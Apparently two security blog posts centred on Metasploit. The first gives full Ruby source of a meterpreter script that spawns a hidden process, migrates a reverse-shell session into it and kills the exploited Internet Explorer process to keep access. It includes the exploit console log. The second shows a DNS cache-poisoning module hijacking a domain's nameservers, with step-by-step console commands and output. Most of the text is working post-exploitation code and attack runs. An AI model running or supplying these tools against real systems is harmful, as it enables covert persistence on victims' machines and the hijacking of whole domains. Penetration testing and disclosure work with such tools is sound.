Automatic migration to a new process with meterpreter

Playing with metasploit's new ie_xml_corruption module, I needed a way to automatically migrate outside of the current process (iexplore.exe). This particular exploit locks up the process upon exploitation, leaving the user sitting at a hung Internet Explorer. Should a user ctrl+alt+delete and terminate it, I didn't want to lose the session.

An example migrate script exists that will do some of this, but if you use it in it's default form, it migrates to lsass.exe. If meterpreter then crashes (or you close it), it'll kill the whole process... which you certainly don't want to do with lsass. Also, my little script has the added benefit of working even if the exploited user doesn't have admin privileges (and LSASS migration would then be impossible).

msf exploit(ie_xml_corruption) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 192.168.182.1
[*] Started reverse handler
[*] Using URL: http://192.168.182.1:80/ie-xml-corruption.html
[*] Server started.
[*] Sending HTML to 192.168.182.1:2761...
[*] Sending DLL to 192.168.182.1:2761...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (75776 bytes)
[*] Meterpreter session 5 opened (192.168.182.1:4444 -> 192.168.182.1:2762)
msf exploit(ie_xml_corruption) > sessions -i 5
[*] Starting interaction with 5...

run launch_and_migrate
[*] Launching hidden cmd.exe...
[*] Process 5560 created.
[*] Current process is IEXPLORE.EXE (656).  Migrating to 5560.
[*] Migration completed successfully.
[*] New server process: cmd.exe (5560)
[*] Old process 656 killed.

Save the file to .msf3/scripts/meterpreter/ (may need to create the subdirectories) and it'll become available to your meterpreter sessions. You should be able to set the script to automatically run with the advanced AutoRunScript option:

Payload advanced options (windows/reflectivemeterpreter/reverse_tcp):

   Name           : AutoLoadStdapi
   Current Setting: true
   Description    : Automatically load the Stdapi extension

   Name           : AutoRunScript
   Current Setting: 
   Description    : Script to autorun on meterpreter session creation

... but I couldn't get it to work in the few minutes I had to play with it. It may be broken on Windows, or I just may not be able to figure out how to do paths in Windows + Ruby. I'll check with my linux install over the weekend.

And here's the code:

launch_and_migrate.rb

##
## Meterpreter script that launches a hidden process, 
## migrates to it, then kills the old process.
##
## Provided by natron (natron 0x40 invisibledenizen 0x2E com)
##

# Get the target process name
target = args[0] || "cmd.exe"

def launchProc(target)
    print_status("Launching hidden #{target}...")

    # Set the vars; these can of course be modified if need be
    cmd_exec    = target
    cmd_args    = nil
    hidden      = true
    channelized = nil
    use_thread_token = false

    # Launch new process
    newproc = client.sys.process.execute(cmd_exec, cmd_args, 
            'Channelized' => channelized,
            'Hidden'      => hidden,
            'InMemory'    => nil,
            'UseThreadToken' => use_thread_token)

    print_status("Process #{newproc.pid} created.")
    
    return newproc
end

def migrateToProc(newproc)
    # Grab the current pid info
    server = client.sys.process.open
    print_status("Current process is #{server.name} (#{server.pid}).  Migrating to #{newproc.pid}.")
    
    # Save the old process info so we can kill it after migration.
    oldproc = server.pid
    
    # Do the migration
    client.core.migrate(newproc.pid.to_i)

    print_status("Migration completed successfully.")

    # Grab new process info
    server = client.sys.process.open

    print_status("New server process: #{server.name} (#{server.pid})")
    
    return oldproc
end

def killApp(procpid)
    client.sys.process.kill(procpid)
    print_status("Old process #{procpid} killed.")
end

# Main flow of execution
newProcPid = launchProc(target)
oldProc = migrateToProc(newProcPid)
killApp(oldProc)

U CAN HAZ METASPLOIT TOO. ENJOI.

(svn update will pull the current code in... it's under intense revisioning right now; something like 6 revisions in 5 hours this morning)

The current version will actually replace the cached entries for the name server itself, allowing you to hijack entire domains at once. Previous code (form earlier this morning) would allow you to take over individual entries (e.g. randomwhatever.example.com), but now you can take over (*.example.com).

Patch up, children.

-n

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

# /msf3/msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.